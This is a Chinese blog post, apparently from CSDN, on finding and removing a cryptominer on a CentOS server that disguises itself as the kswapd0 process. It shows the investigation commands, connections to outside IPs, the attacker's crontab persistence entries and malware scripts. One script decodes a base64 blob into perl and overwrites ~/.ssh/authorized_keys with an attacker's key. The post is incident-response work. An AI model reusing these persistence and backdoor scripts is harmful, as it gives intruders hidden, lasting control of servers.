伪装为kswapd0进程的挖矿木马

最新推荐文章于 2024-08-12 16:31:57 发布
最新推荐文章于 2024-08-12 16:31:57 发布
阅读量2.5k 收藏 8
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47967031/article/details/118242625
版权

一、起因

腾讯云给我发了几封邮件说我的服务器被木马攻击。

image.png

我打开服务器监控一看,闲置的服务器CPU飙升。

image.png

二、排查

2.1 首先查询CPU占用最多的3个进程

查使用内存最多的K个进程

方式一:ps -aux | sort -k3nr | head -K

image.png

sort参数说明:
|选项 |说明
|—————|—————————————————————————
|-n |依照数值的大小排序,不加-n按字符串大小排序
|-r |以相反的顺序来排序
|-t |设置排序时所用的分隔字符
|-k |指定需要排序的列
|-u |去重

方式二:输入 top , 然后输入大写P(输入大写M是按内存倒排)

image.png

最终发现是kswapd0进程在作乱。

2.2 排查kswapd0进程

2.2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息

[root@VM-0-13-centos etc]# netstat -antlp | grep kswapd0
tcp        0      0 172.17.0.13:55402       45.9.148.129:80         ESTABLISHED 31036/./kswapd0

发现一个与本机端口通信的是一个荷兰的ip。

2.2.2 执行命令netstat -antlp | grep 45.9.148 查询该地区ip的其他网络占用情况

[root@VM-0-13-centos etc]# netstat -antlp | grep 45.9.148
tcp        0      1 172.17.0.13:47182       45.9.148.99:443         SYN_SENT    31000/rsync         
tcp        0      0 172.17.0.13:55402       45.9.148.129:80         ESTABLISHED 31036/./kswapd0

发现还有一个rsync进程在工作。

执行 ps -ef | grep 31000

[root@VM-0-13-centos etc]# ps -ef | grep 31000
root     20734 28364  0 16:22 pts/1    00:00:00 grep --color=auto 31000
cj       31000     1  0 14:20 ?        00:00:00 rsync

确实有这个rsync进程在工作。

2.2.3 查找进程的详细信息

我们来到/proc/目录下查找对应的pid号,即/proc/31000和/proc/31036。可以在这两个目录下找到rsync进程和kswapd0进程的详细信息。

找到启动的脚本如下:

/proc/31000/exe -> /usr/bin/perl
/proc/31036/exe -> /tmp/.X25-unix/.rsync/a/kswapd0

其实应该看看cmdline文件的,但是已经被我删了。

/proc/pid/cmdline 进程启动命令
/proc/pid/cwd 链接到进程当前工作目录
/proc/pid/environ 进程环境变量列表
/proc/pid/exe 链接到进程的执行命令文件
/proc/pid/fd 包含进程相关的所有的文件描述符
/proc/pid/maps 与进程相关的内存映射信息
/proc/pid/mem 指代进程持有的内存,不可读
/proc/pid/root 链接到进程的根目录
/proc/pid/stat 进程的状态
/proc/pid/statm 进程使用的内存的状态
/proc/pid/status 进程状态信息,比stat/statm更具可读性
/proc/self 链接到当前正在运行的进程

2.2.4 在cj用户下查看定时任务 crontab -l

[cj@VM-0-13-centos ~]$ crontab -l
1 1 */2 * * /home/cj/.configrc/a/upd>/dev/null 2>&1
@reboot /home/cj/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/cj/.configrc/b/sync>/dev/null 2>&1
@reboot /home/cj/.configrc/b/sync>/dev/null 2>&1  
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

还给我起了好多定时启动和重启启动的脚本。

2.2.4.1 查看 /home/cj/.configrc/a/ 目录

看一下upd脚本

#!/bin/sh
cd /home/cj/.configrc/a
  if test -r /home/cj/.configrc/a/bash.pid; then
    pid=$(cat /home/cj/.configrc/a/bash.pid)
    if $(kill -CHLD $pid >/dev/null 2>&1); then
      exit 0
  fi
fi
./run &>/dev/null

在脚本中检查了bash.pid是否存在且可读,如果存在读取该pid并杀死进程,如果杀死成功,则退出脚本,否则执行run脚本;
bash.pid文件作用:1. pid文件的内容:pid文件为文本文件,内容只有一行, 记录了该进程的ID。用cat命令可以看到。2. pid文件的作用:防止进程启动多个副本。只有获得pid文件(固定路径固定文件名)写入权限(F_WRLCK)的进程才能正常启动并把自身的PID写入该文件中。其它同一个程序的多余进程则自动退出。



查看下run脚本

#!/bin/bash
./stop
./init0
sleep 10
pwd > dir.dir
dir=$(cat dir.dir)
ARCH=`uname -m`
        if [ "$ARCH" == "i686" ]; then
                nohup ./anacron >>/dev/null &
        elif [ "$ARCH" == "x86_64" ];   then
                ./kswapd0
        fi
echo $! > bash.pid

如果硬件类型是“i686”的话,就启动./anacron脚本;如果是“x86_64”的话,就启动万恶的kswapd0脚本。

查看下kswapd0脚本

额,打不开,有大佬指点一下吗?

2.2.4.2 查看 /home/cj/.configrc/b/ 目录

查看sync脚本

#!/bin/sh
cd /home/cj/.configrc/b
./run

直接调用run脚本。

查看run脚本

#!/bin/sh
nohup ./stop>>/dev/null &
sleep 5
echo "yw5Ik......RPKjIhWyJCYEAAPzBJXX0=" | base64 --decode | perl
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAB......3K+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh

原文件字符长度有4w多字,文章生成器都是一些密钥信息,将不重要的密钥信息删减了大半。该脚本主要就是将公钥写到.ssh文件中,然后就可以控制计算机了。

三、解决

  1. crontab -e删除木马创建的定时任务。包括/var/spool/cron和/etc/cron.d目录下的定时任务文件也要排查一下。
  2. 删除所有木马创建的文件。主要
最低0.47元/天 解锁文章
pxr007
关注
Ubuntu16.04.01 kswapd0 进程占用cpu很高,中了亡命徒(Outlaw)挖矿B毒
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
05-17 898
top看一下主机的资源使用情况 kswapd0 是系统的虚拟内存管理程序,如果物理内存不够用,系统就会唤醒 kswapd0 进程,由 kswapd0 分配磁盘交换空间作缓存,因而占用大量的 CPU 资源。(copy) netstat -antlp|grep kswapd0 tcp 0 0 192.168.31.230:45832 45.9.148.58:80 ESTABLISHED 28315/kswapd0 netstat -antlp|grep -e
玄机——第九章-查杀linux挖矿病毒 kswapd0(应急响应) wp
焦虑的焦虑
07-12 2368
第九章-kswapd0挖矿
清理服务器中的挖矿进程kswapd0 & tsm
MaggieTang0622的博客
11-25 1118
挖矿进程kswapd0&tsm清理
Nginx异常关闭之中了挖矿病毒kswapd0
最新发布
sunyanchun的专栏
08-12 231
困扰了接近一个月,偶然查询全部定时任务时发现: 5 8 * * 0 /root/.configrc5/b/sync>/dev/null 2>&1,很陌生的一个定时任务,确定自己及其他人没有加过,查询了一下资料是“挖矿病毒kswapd0”相关任务,赶紧查了一下服务器其它信息,确实中招了。3、加入每天自动重启Nginx任务脚本;隔几天还是出现异常关闭。用 rm -rf 命令逐条删除,rm -rf /root/.configrc5/*,或者rm -rf /root/.configrc5/a/kswapd0
Linux病毒 - 挖矿木马 kswapd0
富强、文明、自由、平等、公正
06-05 482
就立刻联想到了,是挖矿木马,但是kswapd0是系统进程,感觉哪里又不太对,本想百度确认一下,结果发现很多人都遇到了这种木马,所以就记录一下。有些病毒还会关联其他进程,可以使用netstat、lsof等工具排查一下,彻底根除。这里分享一个小技巧,怎么样区分, kswapd0是管理虚拟内存的系统进程,还是挖矿木马病毒。今天客户的服务器CPU爆满,NGINX进程被杀死。通过pid很容易就能区分是不是木马病毒。
服务器(Linux)挖矿木马病毒(kswapd0进程使cpu爆满)
热门推荐
小韩的博客
04-03 2万+
服务器(Linux)挖矿木马病毒(kswapd0进程使cpu爆满)
centos kswapd0 挖矿木马病毒进程CPU100解决
1193379199的博客
01-20 1177
很多病毒都是有会在定时任务里面,以至于很难清理清楚。(由于我的服务器买油开启定时任务服务,所以里面没有任务)2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息。主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程。最好把木马程序和定时任务都清理完了再杀掉,要不然还会自动重启。1.在系统里面top一下,查看了所有进程。2.排查kswapd0进程。7.杀掉kswapd0进程。4.查看进程的工作空间。
应急响应-挖矿病毒(kswapd0
weixin_45690589的博客
10-10 1223
应急响应-挖矿病毒(kswapd0
kswapd0进程占用CPU非常高--解决方案.docx
08-13
kswapd0是Linux内核的一个后台进程,它的主要职责是负责内存交换,即当物理内存不足时,将不活跃的页面(内存页)移动到磁盘上的交换空间,以便为新的内存请求腾出空间。当kswapd0的CPU占用率过高,可能有以下几个...
【安全】查杀linux挖矿病毒 kswapd0
飞的博客
04-11 2287
按照腾讯云报道,此次攻击为“亡命徒(Outlaw)僵尸网络”该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。高cpu占用,使用top命令查看cpu使用率长时间50%以上,cpu占用异常的进程八成就是挖矿病毒进程。此病毒隐藏了自己,top命令无法查看到挖矿病毒进程,可通过sysdig命令找到隐藏进程。注意,该进程有子进程spamd child,需要一同清理,否则会再次重启。同时检查如下目录,将可疑文件清理掉。
解决centos服务器遭黑客安装挖矿木马导致kswapd0进程使用的cpu过高问题
皓亮君的博客
03-07 2789
文章目录简介1.查看kswapd0进程使用的PID2.查看进程的工作空间3.切换到木马程序目录并删除4.清理定时任务5.查看所有用户的定时任务6.清理看kswapd0进程7.修改服务器密码8.总结 简介 最近发现服务器特别卡,然后发现kswapd0占用的cpu高达800%,上网科普下kswapd0进程,kswapd0占用CPU时, 说明机器的全部内存(物理内存+虚拟内存)已经用尽了,机器不得不把内存里的内容卸载到硬盘, 然后才能加载所要的程序 但是我查看下top发现服务器的内存还有10个G没使用,查阅一些文
【Linux系统恶意代码】“亡命徒(Outlaw)僵尸网络” Kswapd0挖矿病毒的发现与清除
AGATHA_66的博客
01-11 1998
系统被SSH暴力破解后,攻击者会在系统目录下添加.configrc5文件夹,文件结构内容如下,名为“a”的文件夹下存放开源门罗币挖矿程序kswapd0(xmrig)和启动脚本,名为“b”的文件夹下存放后门程序run和执行脚本。执行stop脚本,睡眠10秒,列出当前工作的路径并输出到dir.dir的文件中,执行kswapd0挖矿程序,把最后运行的后台进程的PID写入到一个.pid文件中。
关于木马病毒kswapd0的处理
We choose to go to the moon in this decade and do the other things, not because they are easy, but beacase they are hard.
03-13 1658
关于木马病毒kswapd0的处理
kswapd0挖矿病毒攻击记录
Shawn的个人博客
02-29 1081
Outlaw病毒通过SSH攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH攻击程序。# 常用的日志分析技巧# 定位有多少IP在爆破主机的root帐号:# 定位有哪些IP在爆破:[0-9][0-9]?[0-9][0-9]?[0-9][0-9]?[0-9][0-9]?)"|uniq -c# 爆破用户名字典是什么?
kswapd0 进程CPU占用过高
qq_34412985的博客
02-25 1384
前几天遇到的一个问题,自己本地用VM配置的虚拟机,一般会top查看进程以及CPU占用的一些情况。又一次用laravel 打印对象,里面的内容比较多,浏览器当时就卡了。 然后看进程的情况。我以为会是nginx和php-fpm 这两个一半一半这样子的情况,结果发现 kswapd0 这个进程直接99%。然后马上又降下去了。前几天一直没时间找原因,今天抽出点时间把这个整理下。   总结下: swa...
挖矿木马】记一次被挖矿木马攻击的过程(Redis被攻击)
ATFWUS的博客
10-26 1万+
不会吧,不会吧,不会2020年了还有人中挖矿木马吧。 0x01.事情经过: 关于这台服务器:我有一台阿里云的服务器(不是学生机)专门拿来做项目测试用的,部署好一些我经常需要用的组件后,平常就没怎么管过。阿里云的检测什么的也都是好的。并且我观察阿里云上的性能和网络层都没有任何问题。 起疑: 有一次我做测试的时候,发现数据库和redis经常连接失败,查看日志发现有大量的用户在连接,并且ip是外国的。因为数据库的密码还给了合作开发的其它人,所以当时没太在意,就简单的做了一些连接限制,重启,就没有管了,.
小心被黑,木马生成器碰不得(图)
要饭's Blog
07-15 1704
2005年注定是网络游戏盛行的一年,木马这个名词我想各位一定不陌生吧?游戏账号被人偷窃屡见不鲜。很多玩家因为报复的心理也想方设法去偷取其他人的号,于是木马横行,但其实……  现在,网上有很多盗号木马生成工具,只要设置好E-mail的用户名及该E-mail的密码,就可以盗号了。可你是否知道这个木马是包含后门的?在你用它来帮你盗号的同时,盗取的用户名及密码也都会发送给木马作者一份,而我们就是要利用嗅探
linux处理kdevtmpfsi,kswapd0挖矿病毒清除)
bluesease的博客
12-12 3021
kdevtmpfsi,kswapd0挖矿病毒问题处理
kswapd0进程占用cpu非常高
06-09
kswapd0是Linux内核中的一个线程,它负责内存的交换和清理工作。当系统内存不足时,kswapd0会将一些不常用的数据从内存中交换到磁盘中,以释放内存空间。如果kswapd0进程占用CPU非常高,可能是由于系统内存不足,导致kswapd0频繁地进行内存交换和清理操作,从而导致CPU占用率高。 解决这个问题的方法主要是增加系统内存或者调整内存管理参数。如果系统内存不足,可以考虑增加物理内存或者启用交换分区。如果系统已经启用了交换分区,可以考虑增加交换分区的大小。另外,还可以调整内存管理参数,如vm.swappiness参数,以控制内存交换和清理的频率。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pxr007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值